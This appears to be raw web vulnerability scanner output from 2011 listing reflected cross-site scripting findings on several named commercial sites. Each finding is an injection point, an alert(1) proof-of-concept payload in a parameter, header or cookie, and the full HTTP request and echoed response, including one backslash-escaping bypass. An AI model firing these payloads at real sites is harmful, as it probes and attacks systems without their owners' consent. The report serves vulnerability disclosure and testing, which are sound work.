<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?82817--><script>alert(1)</script>46b3e6bc807=1&Action=DisplayESIPage&Currency=USD&ESIHC=f4a37a06&Env=BASE&Locale=en_US&SiteID=adbevlus&StyleID=35830700&StyleVersion=9&ceid=168730900&cename=TopHeader&id=HomePage&script> ...[SNIP]...
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 93404<script>alert(1)</script>4fe0689991c was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/getApi.php?return=json&cb=logger.getPubGA_onSuccess93404<script>alert(1)</script>4fe0689991c&service=getPublisherDomains&publisher=null HTTP/1.1 Host: wd.sharethis.com Proxy-Connection: keep-alive Referer: http://edge.sharethis.com/share5x/index.09d1e4c2e185e924c1f8716db0b87f2c.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==; __uset=yes
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 12:46:32 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 114
logger.getPubGA_onSuccess93404<script>alert(1)</script>4fe0689991c(FAILED TO CONNECT TO read USING _connect_read);
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload c8398<script>alert(1)</script>a659ef576a7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /proxy.php HTTP/1.1 Host: auth.idgenterprise.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c8398<script>alert(1)</script>a659ef576a7 Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:29:59 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.8 Content-Length: 883 Connection: close Content-Type: text/html; charset=UTF-8
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5265a'%3balert(1)//8e077baef99 was submitted in the Referer HTTP header. This input was echoed as 5265a';alert(1)//8e077baef99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /play.html?code=19842;6812;5711;0&from= HTTP/1.1 Host: optimized-by.simply.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=5265a'%3balert(1)//8e077baef99 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 14:04:13 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0 P3P: CP='NOI DSP COR CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR NAV INT PRE' Set-Cookie: ToBeValidatedFrom=; Domain=.simply.com; Expires=Mon, 07-Mar-2011 14:04:13 GMT; Path=/ Set-Cookie: ToBeValidated="http://www.google.com/search?hl=en&q=5265a';alert(1)//8e077baef99"; Domain=.simply.com; Expires=Mon, 07-Mar-2011 14:04:13 GMT; Path=/ Set-Cookie: ad_simply_viewer=a6d205ac-7061-44be-bd96-387cfe92809a; Domain=.simply.com; Expires=Mon, 07-Mar-2011 14:04:13 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Content-Length: 883
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14cfc\"%3balert(1)//3209b2fa1bc was submitted in the Referer HTTP header. This input was echoed as 14cfc\\";alert(1)//3209b2fa1bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /flowers/18-Red-Roses-30050119 HTTP/1.1 Host: products.proflowers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=14cfc\"%3balert(1)//3209b2fa1bc
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a02b"><script>alert(1)</script>292174cd4fc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /order/checkout.php HTTP/1.1 Host: secure.avangate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=4a02b"><script>alert(1)</script>292174cd4fc
Response
HTTP/1.1 200 OK Server: Avangate Date: Mon, 28 Feb 2011 13:33:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding Set-Cookie: PHPSESSID=sha4ogohkdq9ujl9uv099cme4hu0j8i8; path=/; secure Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 37918
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=4a02b"><script>alert(1)</script>292174cd4fc"> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab503'-alert(1)-'da78fba5742 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /en/website_monitoring_features.php HTTP/1.1 Host: secure.watchmouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ab503'-alert(1)-'da78fba5742
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:33:17 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: private, no-cache, must-revalidate, max-age=3600 Pragma: no-cache ETag: "0-en-bc33fbe3ba87f60456a55cf7956d2bc7" Content-Language: en P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173.193.214.243::0::http://www.google.com/search?hl=en&q=ab503'-alert(1)-'da78fba5742::website_monitoring_features.php'); var serverRef = encodeURIComponent('http://www.google.com/search?hl=en&q=ab503'-alert(1)-'da78fba5742'); if(document && document.referrer){ jsRef = encode ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 11765<script>alert(1)</script>58ae9e1a948 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /Tracking/V2/BannerCreative/Impression/ HTTP/1.1 Host: trk.vindicosuite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=11765<script>alert(1)</script>58ae9e1a948
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Date: Mon, 28 Feb 2011 13:33:58 GMT Expires: Mon, 28 Feb 2011 13:33:58 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDCACQDRST=OJECHOCBILOBLCCEGKFELFNA; path=/ X-Powered-By: ASP.NET Content-Length: 832 Connection: Close
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 6e145<script>alert(1)</script>2d2eac4a296 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /Tracking/V2/BannerCreative/Impression/ HTTP/1.1 Host: trk.vindicosuite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6e145<script>alert(1)</script>2d2eac4a296 Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Date: Mon, 28 Feb 2011 13:33:59 GMT Expires: Mon, 28 Feb 2011 13:33:59 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDAQCSBSST=IBOGMCDBGNJIKFEFIPGBLJIL; path=/ X-Powered-By: ASP.NET Content-Length: 668 Connection: Close
The value of the eyeblaster cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 18199%3balert(1)//9a06f7cdff8 was submitted in the eyeblaster cookie. This input was echoed as 18199;alert(1)//9a06f7cdff8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2096754&PluID=0&w=640&h=480&ord=ADXRAND&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3abc/2/0/%2a/p%3B234075239%3B0-0%3B0%3B42936999%3B255-0/0%3B40023356/40041143/1%3B%3B%7Eaopt%3D2/0/26/0%3B%7Esscs%3D%3fhttp://tr.adinterax.com/re/computerworld%2CCSO_verisign_fy11q5_online_WelAd_022811%2CC%3DVerisign%2CP%3DCSO%2CA%3DVerisign%2CK%3D461260/0.2935413271188736/0/tc%2cac%2cl2c%2cc:/$$ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C4=; eyeblaster=BWVal=&BWDate=&debuglevel=18199%3balert(1)//9a06f7cdff8; u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g; A3=hvPTaiJy0c6L00001hK5Samaw0bfZ00001hK5JalZa0bfZ00002gIlWai180aCf00001heSmakII0c9M00001gnhgai180cbS00001; B3=8z6A0000000003tr8r8g0000000001tf8z130000000001th8qaI0000000001tn7.Ws0000000001tf
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: A3=gnesamti0cbS00001hvPTaiJy0c6L00001hK5Samaw0bfZ00001hK5JalZa0bfZ00002gIlWai180aCf00001heSmakII0c9M00001gnhgai180cbS00001; expires=Sun, 29-May-2011 07:46:03 GMT; domain=.serving-sys.com; path=/ Set-Cookie: B3=8z6A0000000003tr8r8g0000000001tf7.VO0000000001ts8z130000000001th8qaI0000000001tn7.Ws0000000001tf; expires=Sun, 29-May-2011 07:46:03 GMT; domain=.serving-sys.com; path=/ P3P: CP="NOI DEVa OUR BUS UNI" Date: Mon, 28 Feb 2011 12:46:02 GMT Connection: close Content-Length: 2136
var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index ...[SNIP]... ]/ig,ebRand).replace(/\[%tp_adid%\]/ig,4289436).replace(/\[%tp_flightid%\]/ig,2096754).replace(/\[%tp_campaignid%\]/ig,134060);}var ebO = new Object();ebO.w=640;ebO.h=480;ebO.ai=4289436;ebO.pi=0;ebO.d=18199;alert(1)//9a06f7cdff8;ebO.rnd=40602271559820;ebO.title="";ebO.jt=1;ebO.jwloc=1;ebO.jwmb=1;ebO.jwt=0;ebO.jwl=0;ebO.jww=0;ebO.jwh=0;ebO.btf=0;ebO.bgs=escape(ebBigS);ebO.rp=escape(ebResourcePath);ebO.bs=escape("bs.serving-sys ...[SNIP]...
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 5f27a<script>alert(1)</script>e86f93e77dc was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /getSegment.php?purl=http%3A%2F%2Fwww.csoonline.com%2Farticle%2F486324%2Fsecurity-tools-templates-policies&jsref=http%3A%2F%2Fwww.csoonline.com%2Fsolution-centers%2Fncircle%3Fitem%3D5%26tab%3D1%26from%3Dcso%26src%3Dcsozne&rnd=1298897210885 HTTP/1.1 Host: seg.sharethis.com Proxy-Connection: keep-alive Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==5f27a<script>alert(1)</script>e86f93e77dc
Response
HTTP/1.1 200 OK Server: nginx/0.8.47 Date: Mon, 28 Feb 2011 12:46:33 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.3 P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM" Content-Length: 1200